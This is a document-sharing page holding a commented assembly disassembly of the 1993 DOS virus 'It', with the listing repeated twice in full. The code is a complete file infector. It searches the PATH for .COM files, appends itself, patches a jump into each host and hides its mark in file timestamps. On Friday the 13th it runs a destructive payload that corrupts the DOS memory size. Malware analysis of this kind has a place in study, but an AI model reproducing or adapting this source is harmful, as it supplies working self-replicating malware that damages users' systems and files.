It
This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA
Overview
Download & View It as PDF for free.
More details
- Words: 1,324
- Pages: 8
;************************************************************************* ;* * ;* it.asm * ;* origin: mexico * ;* size:457 * ;* disassembly & analysis by: kohntark * ;* created: 24-apr-93 * ;* * ;************************************************************************* main
host:
segment assume cs:main, ds:main org 100h jmp add add add add add nop nop nop nop nop add add add add add add nop nop nop nop nop add add add add add add nop nop nop nop nop int
virus bx,22h cx,23h dx,2dh si,17h di,22h
; (0147) ;do nothing host
ax,22h bx,22h cx,23h dx,2dh si,17h di,22h
ax,22h bx,22h cx,23h dx,2dh si,17h di,22h
20h
;host program terminate
;***************************************************************************** ; virus starts here ;***************************************************************************** virus:
push call
ax get_poe
;save ax, unnecessary
get_poe:
pop sub
bp bp,304d
;get point of entry ;pad index
;**************************************** ; restore host ;**************************************** lea mov mov cld rep
si,[bp+753d] di,100h cx,3 movsb
;host_stub ;address to restore to ;restore 3 bytes ;clear direction flag ;restore from si to di 3 bytes
;**************************************** ; get dta's address ;**************************************** push mov int
es ah,2fh 21h
;save es ;ah=function 2fh ;get dta address into es:dx
;**************************************** ; save dta address into v-code ;**************************************** mov mov
ss:763d[bp],bx ss:765d[bp],es
;(600d:02fb=3032h) = ;(600d:02fd=3032h) =
763 765
;**************************************** ; redirect the dta into v-code ;**************************************** mov lea int
ah,1ah dx,[bp+767d] 21h
;ah=function 1ah ;load effective addr ;set dta to ds:dx (heap)
;**************************************** ; hook int 24h critical error handler ;**************************************** mov lea int
ax,2524h dx,[bp+710d] 21h
;ah=function 25h ;load effective addr ;set intrpt vector al to ds:dx
;**************************************** ; scan for 'path=' in environment ;****************************************
find_path:
al
mov xor
es,ds:44d di,di
;es:di => environment segment ;zero register
lea lodsb mov repne
si,[bp+742d]
;load effective ;string [si] to ;scan the whole ;rept zf=0+cx>0
cx,8000h scasb
addr (438) al segment scan es:[di] for
mov
cx,4
;*************************************** ; loop to check for the next 4 ; characters ;*************************************** check_next_4: lodsb scasb jnz loop
find_path check_next_4
;string [si] to al ;scan es:[di] for al ;if not all there start all over ;loop to check next character
pop mov lea jmp
es ss:759d[bp],di di,[bp+32ah] short slash_ok
;save the address of the path ;filename workspace ; (01d2)
;****************************************** ; look in the path for more subdirectories ;****************************************** set_subdir:
cmp jne jmp
byte ptr ss:759d[bp],00 ;(600d:02f7=3856h) found_subdir ; jump if not equal reset_dta ; (029e)
push mov mov lea
ds ds,ds:44d si,ss:759d[bp] di,[bp+32ah]
found_subdir: ;environment ;(600d:02f7=3856h) ;di points to filename workspace
move_subdir: lodsb cmp je or jz stosb jmp moved_last_one:
short move_subdir
;string [si] to al, get char ;';' path delimiter ;found another dir ;zero ? ;jump if zero ;store al to es:[di] ;(01b6)
xor
si,si
;zero register
pop mov cmp je mov stosb
ds ss:759d[bp],si byte ptr [di-1],5ch slash_ok al,5ch
mov
ss:761d[bp],di
;restore filename pointer to name
lea mov
si,[bp+2ebh] cx,6
;restore si ;# of bytes to move point to *.com
al,3bh moved_one al,al moved_last_one
moved_one:
slash_ok: workspace
;(600d:02f7=3856h) ; '\' ; jump if equal ; '\' ; store al to es:[di]
rep
movsb
es:[di]
;rep while cx>0 mov [si] to ;move *.com to workspace
;************************************ ; find files to infect ;************************************
find_next:
find_first:
found_file:
more_chars:
mov mov lea int
ah,4eh cx,3 dx,[bp+32ah] 21h
jmp
short find_first
mov int
ah,4fh 21h
;ah=function 4fh ;find next filename match
jnc jmp
found_file short set_subdir
; jump if carry=0
mov and cmp je
al,ss:315h[bp] al,1eh al,1eh find_next
;get time from dta ;mask off all but seconds ;seconds = 60? ;possibly infected get next file
cmp ja
word ptr ss:319h[bp],0fbc2h find_next
lea mov
si,[bp+31dh] di,ss:761d[bp]
;di => filename ;si => filename in dta
al,al more_chars
;move string ;store al to ;zero ? move ;jump if not
lodsb stosb or jnz
;ah=function 4eh ;attributes read only or hidden ok ;load effective addr ;find 1st filenam match @ds:dx
;is file too long? ;if so get next file
to the end of path es:[di] until we find a 00 zero
;********************************** ; get file's attributes from dta ;********************************** mov xor lea int
ax,4301h cx,cx dx,[bp+32ah] 21h
;ah=function 43h ;cx = 0 ;dx => path/filename ;get/set file attrb, nam@ds:dx
;************************************ ; open file for i/o ;************************************ mov lea int
ax,3d02h dx,[bp+32ah] 21h
;ah=function 3dh ;load effective addr,name of file ;open file, al=mode,name@ds:dx
jc mov
reset_attr bx,ax
;jump if carry set ;put file handle in bx
;***************************************** ; read file's 1st 3 bytes ;***************************************** mov mov lea int
ah,3fh cx,3 dx,[bp+2f1h] 21h
;ah=function 3fh ;# of bytes to read ;put 3 bytes here ;read file, cx=bytes, to ds:dx
jc cmp jne
reset_date ax,3 reset_date
;problem? set id and exit ;problem? set id and exit
;************************************** ; move file pointer to eof ;************************************** mov xor xor int
ax,4202h cx,cx dx,dx 21h
jc
reset_date
; zero register ; zero register ; dos services ah=function 42h ; move file ptr, cx,dx=offset ;problem? set id and exit
;***************************************** ; calculate host's jump to virus address ;***************************************** sub mov
ax,3 word ptr ss:757d[bp],ax
; (600d:02f5=5449h)
;*************************************** ; write virus to eof ;*************************************** mov mov lea int
ah,40h cx,1c9h dx,[bp+12ch] 21h
;ah=function 40h' ;write 457 bytes ;load effective addr ;write file cx=bytes, to ds:dx
jc cmp jne
reset_date ax,1c9h reset_date
;problem? set id and exit ;wrote 457 bytes? ;if not reset date & exit
;*************************************** ; move file ptr to beginning of file ;*************************************** mov xor xor int
ax,4200h cx,cx dx,dx 21h
;ah=function 42h ;zero register ;zero register ;move file ptr, cx,dx=offset
jc
reset_date
;problem? set id and exit
;**************************************** ; write jmp code to virus at the
; beginning of the new host ;**************************************** mov mov lea int
ah,40h cx,3 dx,[bp+2f4h] 21h
;ah=function 40h ;write 3 bytes ;3 bytes here ;write file cx=bytes, from ds:dx
;*************************************** ; reset file's date and time and fix id ;*************************************** reset_date: mov mov mov and or int
ax,5701h cx,ss:315h[bp] dx,ss:317h[bp] cx,0ffe0h cl,1eh 21h
;ah=function 57h ;(600d:0315=0) ;(600d:0317=0) ;fix id (time) ;set seconds to 60 (30 * 2) ;set file date & time
;********************************* ; close file handle ;********************************* mov int
ah,3eh 21h
;ah=function 3eh ;close file, bx=file handle
;********************************* ; restore file attrs ;********************************* reset_attr:
here
mov xor mov
ax,4301h cx,cx cl,ss:314h[bp]
;ah=function 43h ;zero register ;(600d:0314=0) previous file attrs
lea int
dx,[bp+32ah] 21h
;file name here ;set file attrb, nam@ds:dx
;**************************************** ; reset dta ;**************************************** reset_dta:
ptr
push mov lds
ds ah,1ah dx,dword ptr ss:763d[bp]
;save current data segment ;ah=function 1ah ;(600d:02fb=3032h) load 32 bit
int
21h
;set dta to ds:dx
;****************************************** ; restore int 24h, critical error handler ;****************************************** lds mov int pop
dx,dword ptr es:12h ax,2524h 21h ds
;(600d:0012=0) load 32 bit ptr ;ah=function 25h ;set intrpt vector al to ds:dx ;restore current data segment
;************************************* ; find out if current date is ; the friday the 13th ;************************************* mov int
ah,2ah 21h
;ah=function 2ah ;get date, cx=year, dx=mon/day
cmp jne
dl,0dh exit
;compare day to 13 ;not the 13th?
cmp jne
al,5 exit
;friday? ;not friday? exit.
;************************************* ; kill dos memory size ; every command run will give a ; out of memory message ;*************************************
exit: code
push mov int
es ah,52h 21h
;save es ;ah=function 52h ;get dos ' list of lists
mov mov pop
es,es:[bx-2] byte ptr es:[0000],00 es
;segment of 1st memory block ;kill memory size ;restore es
pop
ax
;restore ax saved at beginning of
xor xor xor xor xor mov push xor retn
bx,bx cx,cx dx,dx si,si di,di bp,100h bp bp,bp
;zero register ;zero register ;zero register ;zero register ;zero register ;set return address ;push return address in stack ;zero register ;return to host
;******************************************************************************* ;*********************************** ; int 24h critical error handler ;*********************************** int_24h_entry: add pop pop pop pop pop pop pop pop
sp,6 ax bx cx dx si di bp ds
;move stack pointer ;restore all registers
pop stc retf
es 2
;set carry flag ;return far
int_24h_entry_end: ;****************************************************************************** copyright host_stub new_jump
db db db db db
'(c) itv85020203' 0 'path=*.com',0 05, 22h, 00 0e9h
;add ax,34d = 052200 ;new host's jmp code to virus ;goes here
;************************************************** ; the dta gets redirected to the heap after file. ; also the working space goes in the heap ;************************************************** main
ends end
host
host:
segment assume cs:main, ds:main org 100h jmp add add add add add nop nop nop nop nop add add add add add add nop nop nop nop nop add add add add add add nop nop nop nop nop int
virus bx,22h cx,23h dx,2dh si,17h di,22h
; (0147) ;do nothing host
ax,22h bx,22h cx,23h dx,2dh si,17h di,22h
ax,22h bx,22h cx,23h dx,2dh si,17h di,22h
20h
;host program terminate
;***************************************************************************** ; virus starts here ;***************************************************************************** virus:
push call
ax get_poe
;save ax, unnecessary
get_poe:
pop sub
bp bp,304d
;get point of entry ;pad index
;**************************************** ; restore host ;**************************************** lea mov mov cld rep
si,[bp+753d] di,100h cx,3 movsb
;host_stub ;address to restore to ;restore 3 bytes ;clear direction flag ;restore from si to di 3 bytes
;**************************************** ; get dta's address ;**************************************** push mov int
es ah,2fh 21h
;save es ;ah=function 2fh ;get dta address into es:dx
;**************************************** ; save dta address into v-code ;**************************************** mov mov
ss:763d[bp],bx ss:765d[bp],es
;(600d:02fb=3032h) = ;(600d:02fd=3032h) =
763 765
;**************************************** ; redirect the dta into v-code ;**************************************** mov lea int
ah,1ah dx,[bp+767d] 21h
;ah=function 1ah ;load effective addr ;set dta to ds:dx (heap)
;**************************************** ; hook int 24h critical error handler ;**************************************** mov lea int
ax,2524h dx,[bp+710d] 21h
;ah=function 25h ;load effective addr ;set intrpt vector al to ds:dx
;**************************************** ; scan for 'path=' in environment ;****************************************
find_path:
al
mov xor
es,ds:44d di,di
;es:di => environment segment ;zero register
lea lodsb mov repne
si,[bp+742d]
;load effective ;string [si] to ;scan the whole ;rept zf=0+cx>0
cx,8000h scasb
addr (438) al segment scan es:[di] for
mov
cx,4
;*************************************** ; loop to check for the next 4 ; characters ;*************************************** check_next_4: lodsb scasb jnz loop
find_path check_next_4
;string [si] to al ;scan es:[di] for al ;if not all there start all over ;loop to check next character
pop mov lea jmp
es ss:759d[bp],di di,[bp+32ah] short slash_ok
;save the address of the path ;filename workspace ; (01d2)
;****************************************** ; look in the path for more subdirectories ;****************************************** set_subdir:
cmp jne jmp
byte ptr ss:759d[bp],00 ;(600d:02f7=3856h) found_subdir ; jump if not equal reset_dta ; (029e)
push mov mov lea
ds ds,ds:44d si,ss:759d[bp] di,[bp+32ah]
found_subdir: ;environment ;(600d:02f7=3856h) ;di points to filename workspace
move_subdir: lodsb cmp je or jz stosb jmp moved_last_one:
short move_subdir
;string [si] to al, get char ;';' path delimiter ;found another dir ;zero ? ;jump if zero ;store al to es:[di] ;(01b6)
xor
si,si
;zero register
pop mov cmp je mov stosb
ds ss:759d[bp],si byte ptr [di-1],5ch slash_ok al,5ch
mov
ss:761d[bp],di
;restore filename pointer to name
lea mov
si,[bp+2ebh] cx,6
;restore si ;# of bytes to move point to *.com
al,3bh moved_one al,al moved_last_one
moved_one:
slash_ok: workspace
;(600d:02f7=3856h) ; '\' ; jump if equal ; '\' ; store al to es:[di]
rep
movsb
es:[di]
;rep while cx>0 mov [si] to ;move *.com to workspace
;************************************ ; find files to infect ;************************************
find_next:
find_first:
found_file:
more_chars:
mov mov lea int
ah,4eh cx,3 dx,[bp+32ah] 21h
jmp
short find_first
mov int
ah,4fh 21h
;ah=function 4fh ;find next filename match
jnc jmp
found_file short set_subdir
; jump if carry=0
mov and cmp je
al,ss:315h[bp] al,1eh al,1eh find_next
;get time from dta ;mask off all but seconds ;seconds = 60? ;possibly infected get next file
cmp ja
word ptr ss:319h[bp],0fbc2h find_next
lea mov
si,[bp+31dh] di,ss:761d[bp]
;di => filename ;si => filename in dta
al,al more_chars
;move string ;store al to ;zero ? move ;jump if not
lodsb stosb or jnz
;ah=function 4eh ;attributes read only or hidden ok ;load effective addr ;find 1st filenam match @ds:dx
;is file too long? ;if so get next file
to the end of path es:[di] until we find a 00 zero
;********************************** ; get file's attributes from dta ;********************************** mov xor lea int
ax,4301h cx,cx dx,[bp+32ah] 21h
;ah=function 43h ;cx = 0 ;dx => path/filename ;get/set file attrb, nam@ds:dx
;************************************ ; open file for i/o ;************************************ mov lea int
ax,3d02h dx,[bp+32ah] 21h
;ah=function 3dh ;load effective addr,name of file ;open file, al=mode,name@ds:dx
jc mov
reset_attr bx,ax
;jump if carry set ;put file handle in bx
;***************************************** ; read file's 1st 3 bytes ;***************************************** mov mov lea int
ah,3fh cx,3 dx,[bp+2f1h] 21h
;ah=function 3fh ;# of bytes to read ;put 3 bytes here ;read file, cx=bytes, to ds:dx
jc cmp jne
reset_date ax,3 reset_date
;problem? set id and exit ;problem? set id and exit
;************************************** ; move file pointer to eof ;************************************** mov xor xor int
ax,4202h cx,cx dx,dx 21h
jc
reset_date
; zero register ; zero register ; dos services ah=function 42h ; move file ptr, cx,dx=offset ;problem? set id and exit
;***************************************** ; calculate host's jump to virus address ;***************************************** sub mov
ax,3 word ptr ss:757d[bp],ax
; (600d:02f5=5449h)
;*************************************** ; write virus to eof ;*************************************** mov mov lea int
ah,40h cx,1c9h dx,[bp+12ch] 21h
;ah=function 40h' ;write 457 bytes ;load effective addr ;write file cx=bytes, to ds:dx
jc cmp jne
reset_date ax,1c9h reset_date
;problem? set id and exit ;wrote 457 bytes? ;if not reset date & exit
;*************************************** ; move file ptr to beginning of file ;*************************************** mov xor xor int
ax,4200h cx,cx dx,dx 21h
;ah=function 42h ;zero register ;zero register ;move file ptr, cx,dx=offset
jc
reset_date
;problem? set id and exit
;**************************************** ; write jmp code to virus at the
; beginning of the new host ;**************************************** mov mov lea int
ah,40h cx,3 dx,[bp+2f4h] 21h
;ah=function 40h ;write 3 bytes ;3 bytes here ;write file cx=bytes, from ds:dx
;*************************************** ; reset file's date and time and fix id ;*************************************** reset_date: mov mov mov and or int
ax,5701h cx,ss:315h[bp] dx,ss:317h[bp] cx,0ffe0h cl,1eh 21h
;ah=function 57h ;(600d:0315=0) ;(600d:0317=0) ;fix id (time) ;set seconds to 60 (30 * 2) ;set file date & time
;********************************* ; close file handle ;********************************* mov int
ah,3eh 21h
;ah=function 3eh ;close file, bx=file handle
;********************************* ; restore file attrs ;********************************* reset_attr:
here
mov xor mov
ax,4301h cx,cx cl,ss:314h[bp]
;ah=function 43h ;zero register ;(600d:0314=0) previous file attrs
lea int
dx,[bp+32ah] 21h
;file name here ;set file attrb, nam@ds:dx
;**************************************** ; reset dta ;**************************************** reset_dta:
ptr
push mov lds
ds ah,1ah dx,dword ptr ss:763d[bp]
;save current data segment ;ah=function 1ah ;(600d:02fb=3032h) load 32 bit
int
21h
;set dta to ds:dx
;****************************************** ; restore int 24h, critical error handler ;****************************************** lds mov int pop
dx,dword ptr es:12h ax,2524h 21h ds
;(600d:0012=0) load 32 bit ptr ;ah=function 25h ;set intrpt vector al to ds:dx ;restore current data segment
;************************************* ; find out if current date is ; the friday the 13th ;************************************* mov int
ah,2ah 21h
;ah=function 2ah ;get date, cx=year, dx=mon/day
cmp jne
dl,0dh exit
;compare day to 13 ;not the 13th?
cmp jne
al,5 exit
;friday? ;not friday? exit.
;************************************* ; kill dos memory size ; every command run will give a ; out of memory message ;*************************************
exit: code
push mov int
es ah,52h 21h
;save es ;ah=function 52h ;get dos ' list of lists
mov mov pop
es,es:[bx-2] byte ptr es:[0000],00 es
;segment of 1st memory block ;kill memory size ;restore es
pop
ax
;restore ax saved at beginning of
xor xor xor xor xor mov push xor retn
bx,bx cx,cx dx,dx si,si di,di bp,100h bp bp,bp
;zero register ;zero register ;zero register ;zero register ;zero register ;set return address ;push return address in stack ;zero register ;return to host
;******************************************************************************* ;*********************************** ; int 24h critical error handler ;*********************************** int_24h_entry: add pop pop pop pop pop pop pop pop
sp,6 ax bx cx dx si di bp ds
;move stack pointer ;restore all registers
pop stc retf
es 2
;set carry flag ;return far
int_24h_entry_end: ;****************************************************************************** copyright host_stub new_jump
db db db db db
'(c) itv85020203' 0 'path=*.com',0 05, 22h, 00 0e9h
;add ax,34d = 052200 ;new host's jmp code to virus ;goes here
;************************************************** ; the dta gets redirected to the heap after file. ; also the working space goes in the heap ;************************************************** main
ends end
host
